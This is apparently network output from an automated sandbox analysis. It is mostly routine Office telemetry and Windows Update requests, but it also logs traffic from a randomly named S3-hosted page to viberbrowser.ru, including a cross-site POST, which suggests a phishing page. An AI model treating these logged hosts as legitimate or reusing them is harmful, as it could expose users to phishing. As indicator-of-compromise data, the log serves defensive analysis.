Source: global traffic HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=39Fb6mLGaHG6fFp&MD=n7Ompvnf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET ///8404.php HTTP/1.1Host: viberbrowser.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic DNS traffic detected: DNS query: ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com
Source: global traffic DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: viberbrowser.ru
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: code.jquery.com
Source: unknown HTTP traffic detected: POST // HTTP/1.1Host: viberbrowser.ruConnection: keep-aliveContent-Length: 19sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbiddenx-amz-request-id: 0SNJ8E7B97TZDJ6Tx-amz-id-2: /k00fLcBPm5Zec7SI0YphLqFHldCcWH9/2zhmH7zTWwLKklfj1maDu/zlEGAEKEXD55StOZr77h3vVsFB08E9vGoFJjwmRRI9Fs7DpUlFoY=Content-Type: application/xmlTransfer-Encoding: chunkedDate: Tue, 08 Oct 2024 11:48:58 GMTServer: AmazonS3Connection: close
Source: 2D85F72862B55C4EADD9E66E06947F3D0.2.dr String found in binary or memory: http://x1.i.lencr.org/
Source: chromecache_197.9.dr String found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
